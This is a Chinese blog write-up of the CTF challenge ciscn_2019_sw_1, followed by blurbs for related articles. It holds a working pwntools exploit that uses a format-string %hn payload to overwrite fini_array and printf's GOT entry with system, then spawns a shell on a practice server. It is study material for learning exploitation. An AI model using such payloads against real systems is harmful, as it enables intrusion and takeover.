格式化字符串+fini_array劫持

最新推荐文章于 2024-04-11 20:11:47 发布
最新推荐文章于 2024-04-11 20:11:47 发布
阅读量770 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51474381/article/details/116211518
版权
这篇博客详细介绍了如何利用格式化字符串漏洞劫持fini_array,实现无限循环,并通过修改printf_got为system_got来执行/bin/sh,从而控制系统。文章提供了具体的exploit代码,展示了在CISCN 2019 SW 1挑战中的漏洞利用过程。
摘要由CSDN通过智能技术生成

新知识点

fini_array劫持:幽默的大师傅的boke

题目是上的ciscn_2019_sw_1

一次格式化字符串很明显。

利用思路

1.格式化字符串劫持fini_array,实现格式化字符串无限循环。

2.改printf_got为system_got,输入/bin/sh.

exp:

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.arch='amd64'
#p=process('ciscn_2019_sw_1')
p=remote('node3.buuoj.cn',26667)
elf=ELF('ciscn_2019_sw_1')
fini_array=0x804979C
system_plt=elf.sym['system']#0x80483d0
printf_got=elf.got['printf']#0x804989c
main=elf.sym['main']#0x8048534
payload=p32(fini_array)+p32(fini_array+2)+p32(printf_got)+p32(printf_got+2)
payload+='%34084c%4$hn'+'%33488c%5$hn'+'%31692c%6$hn'+'%33844c%7$hn'
print payload
p.recvuntil('name?\n')
p.sendline(payload)
p.recvuntil('name?\n')
p.sendline('/bin/sh\x00')
p.interactive()

 

NN小弟
关注
__fini_array劫持
qq_36495104的博客
08-30 1148
3×17-x64静态编译程序的fini_array劫持 参考 pwnable.tw新手向write up(二) 3×17-x64静态编译程序的fini_array劫持 pwnable.tw 3x17 1 劫持fini_array,循环写 劫持fini_array[1]为main函数地址,fini_array[0]为__libc_csu_fini,将长度为18的任意地址写升级为长度无限制的任意地址写 2 栈迁移,构造ROP chain 在0x4b40f0+0x10地址处构造ROP chain ROP ch
攻防世界格式化字符串漏洞greeting150
Rt1Text的博客
04-10 451
1.checksec+运行 32位/NX堆栈不可执行/Canary保护 注意一点:没有RELRO保护,got表完全可写 2.IDA常规操作 1.main函数 2.getnline函数 看到以上信息可以 泄露任意地址的内存 但是........上面的看着感觉不是很多对 原来是这样 出现了aaaa---->0x61616161,参数在格式化字符串第12个位置 aaaaaa%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,...
(格式化字符串漏洞).fini.array劫持,使程序流程循环进行
半岛铁盒的博客
04-04 926
用gdb调试main函数的时候,不难发现main的返回地址是__libc_start_main也就是说main并不是程序真正开始的地方,__libc_start_main的执行是在main的前面。 可以发现__libc_start_main函数的参数中,有3个是函数指针: 其中__libc_csu_fini是在main执行完毕后执行的 简单地说,在main函数后会调用.init段代码和.init_array段的函数数组中每一个函 数指针。而我们的目标就是修改.fini_array数组的第一个元素为star
【八芒星计划】静态编译劫持fini_array
carol2358的博客
09-05 492
引用: https://www.freebuf.com/articles/system/226003.html https://bbs.pediy.com/thread-259298.htm 文章目录前言一、Memory Monster II总结 前言 直接先说使用方法: fini_array[1]放想要调用的地址addrA,fini_array[0]放__libc_csu_fini的地址,就可以无限调用addrA 也可以用来栈迁移 fini_array[0]放leave,ret,fini_array
劫持 64 位静态程序 fini_array 进行 ROP 攻击
SkYe's Blog
09-13 831
[scode type=“lblue”]2020年8月6日 标题添加“静态程序”,补充与 64 位动态程序对比和利用方法差异小结[/scode] 程序起点 程序的启动流程如图所示: 可以看到 main 函数不是程序起点,之前写的 格式化字符串盲打 也分析过 text 段起点是 _start 函数 。_start 函数调用__libc_start_main 完成启动和退出工作。具体看看 _start 函数: .text:0000000000401A60 public star
Bug:__uClibc_main.c:(.text+0x20): undefined reference to `__fini_array_start'问题的解决
chinaclock的专栏
09-28 7573
今天碰到了一个问题: __uClibc_main.c:(.text+0x20): undefined reference to `__fini_array_start' __uClibc_main.c:(.text+0x24): undefined reference to `__fini_array_end' /opt/toolchains/uclibc-crosstools-gcc-
攻防世界greeting-150——进阶格式化字符串
weixin_48066554的博客
05-21 577
水题也能学东西阿,小孩子不懂事,做着玩的
格式化字符串
m0_49959202的博客
10-29 811
文章目录格式化字符串1.原理1.1 格式化字符串介绍1.1.1 格式化字符串函数1.1.2 格式化字符串1.1.3 参数1.2 32位格式化字符串漏洞基本原理1.3 32位格式化字符串利用思路1.3.1 利用1:程序崩溃1.3.2 利用2:泄露内存1.3.2.1 泄露栈内存1.3.2.1.1 获取栈变量数值1.3.2.1.2 获取栈变量对应字符串1.3.2.2 泄露任意地址内存1.3.3 利用3:覆盖内存1.3.3.1 覆盖栈内存1.3.3.2 覆盖任意地址内存1.3.3.2.1 覆盖为小数字1.3.3.3
64位静态编译程序的fini_array劫持及ROP攻击
Vantler的博客
03-02 556
详解64位静态编译程序的fini_array劫持及ROP攻击:https://www.freebuf.com/articles/system/226003.html 如果劫持后可实现可控函数循环执行的目的,那是不是可以用来安装持续监听的后门? ...
CISCN 2019西南 PWN1 之.fini_array利用
最新发布
qq_60209620的博客
04-11 433
数组中存在一些函数指针,程序在退出时,会调用这些指针,所以我们可以修改数组内容,可以达到控制程序的执行流。本题主要是因为我们只能执行一次格式化字符串,,没办法在一次执行中拿到shell,所以可以利用劫持数组,使程序再次执行main函数。用查看。
关于 .init .fini .init_array .fini_array 日志 7.16 pwn
RobinZZX的博客
07-16 3289
查找资料的高效性 retn 返回到栈顶地址 关于 .init .fini .init_array .fini_array 其中存放着的是在main函数执行前执行的代码,由__libc_start_main调用,(__libc_start_main在libc.so上,所以先有start()调用__libc_start_main,再调用init段的代码)在这段代码中就有我们经常使用的libc_csu的...
通过利用fini_array部署并启动ROP攻击 | TaQini
HiTaQini
05-08 1517
这篇文章源自pwnable.tw上的一道题目3x17,其中用到了fini_array劫持,比较有意思,于是写篇文章分析记录总结一下关于fini_array的利用方式~
【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1
Mr_Fmnwon的博客
01-22 1904
如果存在格式化字符串,保护机制开的不健全,通常可以劫持got表,构造后门函数。然而,如果不存在循环、栈溢出控制rop等方式,如果格式化字符串漏洞点正常来说只能执行一次,getshell是比较困难的。不过,linux下的二进制程序,在最后退出时,总会执行一些清扫函数,其中涉及到了fini_array这个数据结构。一、fini_array通过利用fini_array部署并启动ROP攻击 | TaQini-CSDN博客简单来说,fini_array数组存放了函数指针,在退出时,会进行调用。
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1487
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
日志 7.15 pwn 堆学习
RobinZZX的博客
07-16 324
调试之后的小心得: 当你申请小chunk的时候,堆管理器分配chunk的大小是按照0x10的单位来配的,当你所申请的大小a超过的能满足a的 (最小容量-0x10) +0x8时,才会分配最小容量,否则是分配最小容量-0x10,因为分配给你的chunk的后一个chunk的prev_size(0x8)可以作为本chunk数据部分使用。 当在题目中发现有打印的机制是跳转在跳转(解引用)时,考虑在第一个跳...
linux 格式化字符串漏洞
sky123博客
02-04 2200
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
Linux下pwn从入门到放弃,[原创][分享]Pwn从入门到放弃(三)
weixin_39977642的博客
05-14 173
0x01 栈溢出利用0x02 基本的ROP利用0x03 题目三:该题目是plaidctf-2013的一道题,ropasaurusrex第一步:checksec看一下该程序开了哪些保护:程序为32位小端,保护只开启了NX保护,意味着堆栈不可执行。第二步:运行该程序看看:待你输入内容后,会给一些的反馈*第三步:gdb动态调试一下看看:可以看到,崩溃在140处,因此可以知道返回地址在144字节处。第四步...
Android C语言_init函数和constructor属性及.init/.init_array节探索
beyond702的专栏
12-13 4370
了解C语言的程序猿都知道有两种方法可以让一部分代码在so或可执行文件被加载的时候先于其它任何函数执行,一种是定义一个void _init(void)函数,另一种是在函数后面声明constructor属性。那么这两种方式在执行的时候有什么区别吗?先后顺序呢?了解ELF文件格式的人又会问它们在文件中的位置又有什么差别呢?这篇文章就来解答这些问题。 首先你需要了解一下ELF文件格式了,这里就不啰嗦了,
.init_array
05-18
`.init_array` 是一个特殊的节(section),用于存储在程序启动时需要执行的全局构造函数(constructor)的地址列表。...在 Linux 系统中,`.init_array` 节通常位于可执行文件的 `.init` 节之后,`.fini_array` 节之前。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值